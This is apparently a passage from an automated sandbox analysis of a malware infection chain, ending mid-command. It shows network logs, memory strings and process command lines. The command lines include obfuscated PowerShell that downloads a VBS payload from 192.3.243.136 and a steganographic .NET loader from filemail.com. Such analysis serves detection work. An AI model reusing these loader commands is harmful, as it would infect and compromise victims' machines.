                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: powershell.exe, 00000001.00000002.1822805726.000000000595C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybes
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.00000000077C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$
                Source: powershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(s
                Source: powershell.exe, 00000001.00000002.1821744750.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF2
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhN
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFn
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFp
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEM
                Source: powershell.exe, 00000003.00000002.1712155166.0000000005397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000007.00000002.2329487892.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail
                Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                Source: powershell.exe, 00000007.00000002.2337193230.0000000004D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/geLR
                Source: powershell.exe, 00000009.00000002.1949160377.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1949062119.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1950549145.0000000002F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT
                Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                Source: powershell.exe, 00000009.00000002.1995186710.00000000072B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt
                Source: powershell.exe, 00000003.00000002.1715998634.0000000007635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..ora
                Source: powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000007.00000002.2359283206.0000000006FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
                Source: powershell.exe, 00000001.00000002.1822805726.0000000004F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.1833233000.0000000007799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
                Source: powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

                System Summary

                barindex
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, 